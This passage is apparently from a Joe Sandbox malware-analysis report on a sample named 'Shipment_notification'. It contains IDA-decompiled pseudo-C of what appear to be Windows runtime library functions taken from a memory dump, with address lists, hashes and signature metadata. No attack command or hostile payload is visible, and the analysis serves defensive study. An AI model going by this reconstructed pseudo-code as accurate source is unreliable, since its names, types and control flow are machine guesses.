                                                                                0x00000000
                                                                                0x01b5bf45
                                                                                0x01b5bf3b
                                                                                0x01b5bf26
                                                                                0x00000000
                                                                                0x01b1fc47
                                                                                0x01b1fc47
                                                                                0x01b1fc49
                                                                                0x01b1fcb2
                                                                                0x01b1fcb4
                                                                                0x01b1fcb6
                                                                                0x01b1fcdc
                                                                                0x01b1fcdc
                                                                                0x00000000
                                                                                0x01b1fcb8
                                                                                0x01b1fcc3
                                                                                0x01b1fcc5
                                                                                0x01b1fcc7
                                                                                0x00000000
                                                                                0x01b1fcc9
                                                                                0x01b1fcc9
                                                                                0x01b1fccd
                                                                                0x00000000
                                                                                0x01b1fccd
                                                                                0x01b1fcc7
                                                                                0x00000000
                                                                                0x01b1fc4b
                                                                                0x01b1fc4b
                                                                                0x01b1fc4e
                                                                                0x01b1fc4e
                                                                                0x01b1fc51
                                                                                0x01b1fc51
                                                                                0x01b1fc54
                                                                                0x01b1fc5a
                                                                                0x01b1fc5c
                                                                                0x01b1fc5f
                                                                                0x01b1fc61
                                                                                0x01b1fc63
                                                                                0x01b1fc65
                                                                                0x01b1fc67
                                                                                0x01b1fc6e
                                                                                0x01b1fc72
                                                                                0x01b1fc72
                                                                                0x01b1fc72
                                                                                0x01b1fc72
                                                                                0x01b1fc67
                                                                                0x01b1fc61
                                                                                0x00000000
                                                                                0x01b1fc5a
                                                                                0x01b1fc49
                                                                                0x01b1fc41
                                                                                0x01b1fc30
                                                                                0x01b1fc27
                                                                                0x01b1fc03
                                                                                0x01b1fbcd
                                                                                0x01b1fbd3
                                                                                0x01b1fbd9
                                                                                0x01b1fbdc
                                                                                0x01b1fbde
                                                                                0x01b1fc99
                                                                                0x01b1fc9b
                                                                                0x01b1fc9d
                                                                                0x01b1fcd5
                                                                                0x01b1fcd5
                                                                                0x01b1fc89
                                                                                0x01b1fc89
                                                                                0x00000000
                                                                                0x01b1fc9f
                                                                                0x01b1fc9f
                                                                                0x01b1fca3
                                                                                0x00000000
                                                                                0x01b1fca3
                                                                                0x00000000
                                                                                0x01b1fbe4
                                                                                0x01b1fbe4
                                                                                0x01b1fbe4
                                                                                0x01b1fbe4
                                                                                0x01b1fbe9
                                                                                0x01b1fbf2
                                                                                0x00000000
                                                                                0x01b1fbf2
                                                                                0x01b1fbde
                                                                                0x01b1fbcb
                                                                                0x01b1fbab
                                                                                0x01b1fc8b
                                                                                0x01b1fc8b
                                                                                0x01b1fc8c
                                                                                0x01b1fb80
                                                                                0x01b1fb72
                                                                                0x01b1fb5e
                                                                                0x01b1fc8d
                                                                                0x01b1fc91
                                                                                0x01b1fadf
                                                                                0x01b1fadf
                                                                                0x01b1fae1
                                                                                0x01b1fae4
                                                                                0x01b1fae7
                                                                                0x01b1faec
                                                                                0x01b1faf8
                                                                                0x01b1fb00
                                                                                0x01b1fb07
                                                                                0x01b1fb0f
                                                                                0x01b1fb0f
                                                                                0x01b1fb07
                                                                                0x00000000
                                                                                0x01b1faf8
                                                                                0x01b1fadd

                                                                                Strings
                                                                                • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 01B5BE0F
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                                                • API String ID: 0-865735534
                                                                                • Opcode ID: f9ad75a6655e48a25d5fcdd1b91ca7dc0613e90183f3e3100cc8ef5423fb3613
                                                                                • Instruction ID: f742eee8bf69f946d6cf5789a78a7d10f19ab147f3dcacd8a9dd86bbc7de6c0f
                                                                                • Opcode Fuzzy Hash: f9ad75a6655e48a25d5fcdd1b91ca7dc0613e90183f3e3100cc8ef5423fb3613
                                                                                • Instruction Fuzzy Hash: D0A11371B006069BEB2DDF68C5507BAB7A5FF48710F4546EDEA06CB684EB30D849DB80
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01AE2D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 63%
                                                                                			E01AE2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1bd5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1bd7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E01B297C0();
				}
				if( *0x1bd79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x1bd79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						L01B11624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01B07D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E01B7FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01B29520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E01B1E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L01B3DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1bd6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1bd6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01B29980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E01B295D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01B07D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01B07D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E01B67016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E01B7FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1bd5350;
							if(_t109 != 0x1bd5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E01B7FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E01B75720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                                0x01ae2d8a
                                                                                0x01ae2d8a
                                                                                0x01ae2d92
                                                                                0x01ae2d96
                                                                                0x01ae2d9e
                                                                                0x01ae2da0
                                                                                0x01ae2da3
                                                                                0x01ae2da5
                                                                                0x01ae2da8
                                                                                0x01ae2dab
                                                                                0x01ae2db2
                                                                                0x01b3f9aa
                                                                                0x01b3f9ab
                                                                                0x01b3f9ae
                                                                                0x01b3f9ae
                                                                                0x01ae2db8
                                                                                0x01ae2dc2
                                                                                0x01b3f9b9
                                                                                0x01b3f9be
                                                                                0x01b3f9bf
                                                                                0x01b3f9bf
                                                                                0x01ae2dcf
                                                                                0x01b3f9c9
                                                                                0x01ae2dd5
                                                                                0x01ae2dd5
                                                                                0x01ae2dd5
                                                                                0x01ae2dde
                                                                                0x01ae2de1
                                                                                0x01ae2e70
                                                                                0x01ae2e72
                                                                                0x01ae2e72
                                                                                0x01ae2de7
                                                                                0x01ae2deb
                                                                                0x01ae2e7c
                                                                                0x01ae2e83
                                                                                0x01ae2e85
                                                                                0x01ae2e8b
                                                                                0x01ae2e8d
                                                                                0x01ae2e92
                                                                                0x01ae2e92
                                                                                0x01ae2e85
                                                                                0x01ae2df1
                                                                                0x01ae2df7
                                                                                0x01ae2df9
                                                                                0x01ae2df9
                                                                                0x01ae2dfc
                                                                                0x01ae2dff
                                                                                0x01ae2e02
                                                                                0x00000000
                                                                                0x01ae2e05
                                                                                0x01ae2e0c
                                                                                0x01b3f9d9
                                                                                0x01ae2e12
                                                                                0x01ae2e12
                                                                                0x01ae2e12
                                                                                0x01ae2e1a
                                                                                0x01b3f9e3
                                                                                0x01b3f9e9
                                                                                0x01b3f9f0
                                                                                0x01b3f9f6
                                                                                0x01b3f9f8
                                                                                0x01b3f9f8
                                                                                0x01b3f9f0
                                                                                0x01ae2e23
                                                                                0x01b3fa02
                                                                                0x01b3fa03
                                                                                0x01b3fa05
                                                                                0x01b3fa06
                                                                                0x00000000
                                                                                0x01ae2e29
                                                                                0x01ae2e29
                                                                                0x01ae2e2e
                                                                                0x01ae2e34
                                                                                0x01ae2e3e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01ae2e44
                                                                                0x01ae2e47
                                                                                0x01ae2e4d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01ae2e4f
                                                                                0x01ae2e54
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01ae2e5a
                                                                                0x01ae2e5f
                                                                                0x01ae2e9a
                                                                                0x01ae2ea4
                                                                                0x01ae2ea5
                                                                                0x01ae2ea8
                                                                                0x01ae2eaf
                                                                                0x01ae2eb2
                                                                                0x01ae2eb5
                                                                                0x01b3fae9
                                                                                0x01b3faeb
                                                                                0x01b3faed
                                                                                0x01b3faef
                                                                                0x01b3faf7
                                                                                0x01b3faf8
                                                                                0x01b3fafd
                                                                                0x01b3faff
                                                                                0x01b3fb04
                                                                                0x01b3fb04
                                                                                0x01b3faff
                                                                                0x01ae2ec0
                                                                                0x01ae2ec4
                                                                                0x01ae2ec6
                                                                                0x01ae2ec8
                                                                                0x01b3fb14
                                                                                0x01b3fb18
                                                                                0x01b3fb1e
                                                                                0x01b3fb21
                                                                                0x01b3fb21
                                                                                0x01ae2ece
                                                                                0x01ae2ece
                                                                                0x01ae2ece
                                                                                0x01ae2ed7
                                                                                0x01ae2e61
                                                                                0x01ae2e63
                                                                                0x01b3fa6b
                                                                                0x01b3fa71
                                                                                0x01b3fa76
                                                                                0x01b3fa78
                                                                                0x01b3fa8a
                                                                                0x01b3fa7a
                                                                                0x01b3fa83
                                                                                0x01b3fa83
                                                                                0x01b3fa8f
                                                                                0x01b3fa91
                                                                                0x01b3fa97
                                                                                0x01b3fa9d
                                                                                0x01b3faa4
                                                                                0x01b3faaa
                                                                                0x01b3faaf
                                                                                0x01b3fab1
                                                                                0x01b3fac3
                                                                                0x01b3fab3
                                                                                0x01b3fabc
                                                                                0x01b3fabc
                                                                                0x01b3fac8
                                                                                0x01b3facb
                                                                                0x01b3fadf
                                                                                0x01b3fadf
                                                                                0x01b3facb
                                                                                0x01b3faa4
                                                                                0x01b3fa91
                                                                                0x01ae2e6f
                                                                                0x01ae2e6f
                                                                                0x01ae2e5f
                                                                                0x01b3fa13
                                                                                0x01b3fa15
                                                                                0x01b3fa17
                                                                                0x01b3fa1f
                                                                                0x01b3fa21
                                                                                0x01b3fa22
                                                                                0x01b3fa25
                                                                                0x01b3fa28
                                                                                0x01b3fa2f
                                                                                0x01b3fa2f
                                                                                0x01b3fa2a
                                                                                0x01b3fa2a
                                                                                0x01b3fa2a
                                                                                0x01b3fa31
                                                                                0x01b3fa34
                                                                                0x01b3fa36
                                                                                0x01b3fa3c
                                                                                0x01b3fa3e
                                                                                0x01b3fa41
                                                                                0x01b3fa43
                                                                                0x01b3fa45
                                                                                0x01b3fa45
                                                                                0x01b3fa41
                                                                                0x01b3fa3c
                                                                                0x01b3fa4a
                                                                                0x01b3fa4f
                                                                                0x01b3fa51
                                                                                0x01b3fa53
                                                                                0x01b3fa56
                                                                                0x01b3fa5b
                                                                                0x01b3fa5e
                                                                                0x00000000
                                                                                0x01b3fa5e
                                                                                0x01ae2e23

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: RTL: Re-Waiting
                                                                                • API String ID: 0-316354757
                                                                                • Opcode ID: f71c95e9ea606ca37b7c209278492b1acd01bff181fa4edbbfa47a8501464949
                                                                                • Instruction ID: 7da8f17b3a188c014806801f930ebf8171e98105e30f8e5bfcf429fef11266a8
                                                                                • Opcode Fuzzy Hash: f71c95e9ea606ca37b7c209278492b1acd01bff181fa4edbbfa47a8501464949
                                                                                • Instruction Fuzzy Hash: 84614871E00615AFEB3ADF6CC888B7E7BF9EB84714F1806EAD511972C1DB3499018782
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01BB0EA5 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 80%
                                                                                			E01BB0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E01BAFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01BB1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01B29730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E01BAA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E01BAA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1bd8b04 >> 0x14) + (_v44 -  *0x1bd8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01B07D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E01BA138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E01B07D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						L01B9FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x1bd8724 & 0x00000008) != 0) {
						E01BA52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E01BB15B5(0x1bd8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                                0x01bb0eb7
                                                                                0x01bb0eb9
                                                                                0x01bb0ec0
                                                                                0x01bb0ec2
                                                                                0x01bb0ecd
                                                                                0x01bb105b
                                                                                0x01bb105b
                                                                                0x01bb1061
                                                                                0x01bb1066
                                                                                0x01bb1066
                                                                                0x01bb106b
                                                                                0x01bb1073
                                                                                0x01bb1073
                                                                                0x01bb0ed3
                                                                                0x01bb0ed6
                                                                                0x01bb0edc
                                                                                0x01bb0ee0
                                                                                0x01bb0ee7
                                                                                0x01bb0ef0
                                                                                0x01bb0ef5
                                                                                0x01bb0efa
                                                                                0x01bb0efc
                                                                                0x01bb0efd
                                                                                0x01bb0f03
                                                                                0x01bb0f04
                                                                                0x01bb0f06
                                                                                0x01bb0f07
                                                                                0x01bb0f09
                                                                                0x01bb0f0e
                                                                                0x01bb0f14
                                                                                0x01bb0f23
                                                                                0x01bb0f2d
                                                                                0x01bb0f34
                                                                                0x01bb0f34
                                                                                0x01bb0f14
                                                                                0x01bb0f52
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01bb0f58
                                                                                0x01bb0f73
                                                                                0x01bb0f74
                                                                                0x01bb0f79
                                                                                0x01bb0f7d
                                                                                0x01bb0f80
                                                                                0x01bb0f86
                                                                                0x01bb0fab
                                                                                0x01bb0fb5
                                                                                0x01bb0fc6
                                                                                0x01bb0fd1
                                                                                0x01bb0fe3
                                                                                0x01bb0fd3
                                                                                0x01bb0fdc
                                                                                0x01bb0fdc
                                                                                0x01bb0feb
                                                                                0x01bb1009
                                                                                0x01bb1009
                                                                                0x01bb1015
                                                                                0x01bb1027
                                                                                0x01bb1017
                                                                                0x01bb1020
                                                                                0x01bb1020
                                                                                0x01bb102f
                                                                                0x01bb103c
                                                                                0x01bb103c
                                                                                0x01bb1048
                                                                                0x01bb1050
                                                                                0x01bb1050
                                                                                0x01bb1055
                                                                                0x00000000
                                                                                0x01bb1055
                                                                                0x01bb0f88
                                                                                0x01bb0f9e
                                                                                0x01bb0fa2
                                                                                0x01bb0fa9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x01bb0fa9
                                                                                0x00000000

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: `
                                                                                • API String ID: 0-2679148245
                                                                                • Opcode ID: b81405643fc2a7d4a4ae4c21eb2aa19eb8fdf03e436c5c6226b9073b1b68e8f7
                                                                                • Instruction ID: ef160d0de1fbf72168176d15617d1f44617d7320ce82b76de5014c2042b41ad4
                                                                                • Opcode Fuzzy Hash: b81405643fc2a7d4a4ae4c21eb2aa19eb8fdf03e436c5c6226b9073b1b68e8f7
                                                                                • Instruction Fuzzy Hash: 2E5190713043429FD729EF28D8D4B6BBBE5EB88704F4409ACF58697690D7B1E805C762
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B1F0BF Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 75%
                                                                                			E01B1F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E01B04120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E01B29830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E01B29990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E01B295D0();
							goto L11;
						} else {
							_t109 = L01B04620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E01B2F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E01B295D0();
										L01B077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                                0x01b1f0d3
                                                                                0x01b1f0d9
                                                                                0x01b1f0e0
                                                                                0x01b1f0e7
                                                                                0x01b1f0f2
                                                                                0x01b1f0f4
                                                                                0x01b1f0f8
                                                                                0x01b1f100
                                                                                0x01b1f108
                                                                                0x01b1f10d
                                                                                0x01b1f115
                                                                                0x01b1f116
                                                                                0x01b1f11f
                                                                                0x01b1f123
                                                                                0x01b1f124
                                                                                0x01b1f12c
                                                                                0x01b1f130
                                                                                0x01b1f134
                                                                                0x01b1f13d
                                                                                0x01b1f144
                                                                                0x01b1f14b
                                                                                0x01b1f152
                                                                                0x01b5bab0
                                                                                0x01b5bab0
                                                                                0x01b1f158
                                                                                0x01b1f158
                                                                                0x01b1f15a
                                                                                0x01b1f160
                                                                                0x01b1f165
                                                                                0x01b1f166
                                                                                0x01b1f16f
                                                                                0x01b1f173
                                                                                0x01b5baa7
                                                                                0x01b5baa7
                                                                                0x01b5baab
                                                                                0x00000000
                                                                                0x01b1f179
                                                                                0x01b1f18d
                                                                                0x01b1f191
                                                                                0x01b5baa2
                                                                                0x00000000
                                                                                0x01b1f197
                                                                                0x01b1f19b
                                                                                0x01b1f1a2
                                                                                0x01b1f1a9
                                                                                0x01b1f1af
                                                                                0x01b1f1b2
                                                                                0x01b1f1b6
                                                                                0x01b1f1b9
                                                                                0x01b1f1c4
                                                                                0x01b1f1d8
                                                                                0x01b1f1df
                                                                                0x01b1f1e3
                                                                                0x01b1f1eb
                                                                                0x01b1f1ee
                                                                                0x01b1f1f4
                                                                                0x01b1f20f
                                                                                0x01b5bab7
                                                                                0x01b5babb
                                                                                0x01b5bacc
                                                                                0x01b5bad1
                                                                                0x01b1f215
                                                                                0x01b1f218
                                                                                0x01b1f226
                                                                                0x01b1f22b
                                                                                0x00000000
                                                                                0x01b1f22b
                                                                                0x01b1f1f6
                                                                                0x01b1f1f6
                                                                                0x01b1f1f9
                                                                                0x01b1f1fb
                                                                                0x01b1f1fb
                                                                                0x01b1f1f4
                                                                                0x01b1f191
                                                                                0x01b1f173
                                                                                0x01b1f152
                                                                                0x01b1f203

                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AC0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_1ac0000_Shipment_notification.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: @
                                                                                • API String ID: 0-2766056989
                                                                                • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                • Instruction ID: f6d5bcb4a8bd6424d7f670c7119741bdd64532e61af05c4f5b92060f6ccc0f00
                                                                                • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                • Instruction Fuzzy Hash: CC519F716047119FC725DF29C840A6BBBF9FF48710F008A6DFA9987690E7B4E914CB91
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 01B63540 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 75%
                                                                                			E01B63540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x1bdd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E01B20BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E01B63706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E01B2FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
